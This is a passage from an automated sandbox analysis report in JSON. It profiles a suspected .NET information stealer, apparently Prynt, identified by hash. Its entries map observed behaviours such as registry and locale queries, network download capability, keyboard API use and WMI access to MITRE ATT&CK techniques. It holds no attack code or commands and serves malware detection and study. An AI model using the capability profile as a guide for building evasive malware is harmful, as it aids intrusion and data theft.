\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 652E0000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKCU\\CONTROL PANEL\\INTERNATIONAL\"; Key: \"SYEARMONTH\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"AR\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"AR\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"AR-SA\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"AR-SA\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"BG\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"BG\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"BG-BG\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"BG-BG\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CA\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CA\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CA-ES\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CA-ES\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"ZH-HANS\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"ZH-HANS\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"ZH-CN\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"ZH-CN\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CS\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CS\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CS-CZ\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CS-CZ\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"DA\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\" was detected as \".NET\" and name: \"Library\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\" was detected as \"VB.NET\" and name: \"Compiler\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteValue\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"DeleteSubKeyTree\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63ED0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75650000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"Global\\CLR_PerfMon_WrapMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" touched \"Windows Management and Instrumentation\" (Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" touched \"WBEM Locator\" (Path: \"HKCU\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\\INPROCSERVER32\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" touched \"PSFactoryBuffer\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IWbemServices\" (Path: \"HKCU\\CLSID\\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\\TREATAS\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" touched \"WbemDefaultPathParser\" (Path: \"HKCU\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\INPROCSERVER32\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject\" (Path: \"HKCU\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-108", "relevance": 1, "name": "Contains ability to execute application (Dotnet)", "description": "Observed function \"set_UseShellExecute\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenBaseKey\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetSubKeyNames\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-99", "relevance": 1, "name": "Contains ability to download files with network (Dotnet)", "description": "Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadString\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadFile\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-126", "relevance": 1, "name": "Dotnet source code contains suspicious native API", "description": "Observed API \"MapVirtualKey\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"CreateMutex\" (Indicator: \"CreateMutex\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"CreateMutex\" (Indicator: \"CreateMutex\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe.config\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\PryntVirus\\\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.INI\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\System32\\MSCOREE.DLL.LOCAL\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\3E921B459B8DEE082170D992356A5329873F2A22CF509BE6C3010F75D71C90E1.EXE.CONFIG\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\FUSION.LOCALGAC\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\PRYNTVIRUS\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\3E921B459B8DEE082170D992356A5329873F2A22CF509BE6C3010F75D71C90E1.INI\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\GAC\\PUBLISHERPOLICY.TME\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"INSTALLROOT\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"CLRLOADLOGDIR\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"USELEGACYV2RUNTIMEACTIVATIONPOLICYDEFAULTVALUE\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"ONLYUSELATESTCLR\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"NOCLIENTCHECKS\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\NET FRAMEWORK SETUP\\NDP\\V4\\FULL\"; Key: \"RELEASE\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"3E921B459B8DEE082170D992356A5329873F2A22CF509BE6C3010F75D71C90E1\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"DISABLECONFIGCACHE\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\SECURITY\"; Key: \"E13C0D23-CCBC-4E12-931B-D9CC2EEE27E4\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\SECURITY\"; Key: \"763FD754-7086-4DFE-95EB-C01A46FAF4CA\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\SECURITY\"; Key: \"A669021C-C450-4609-A035-5AF59AF4DF18\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\WMI\\SECURITY\"; Key: \"CC2BCBBA-16B6-4CF3-8990-D74C2E8AF500\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"CACHELOCATION\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"DOWNLOADCACHEQUOTAINKB\"; Value: \"\")\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"ENABLELOG\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" trying to access non-existent file 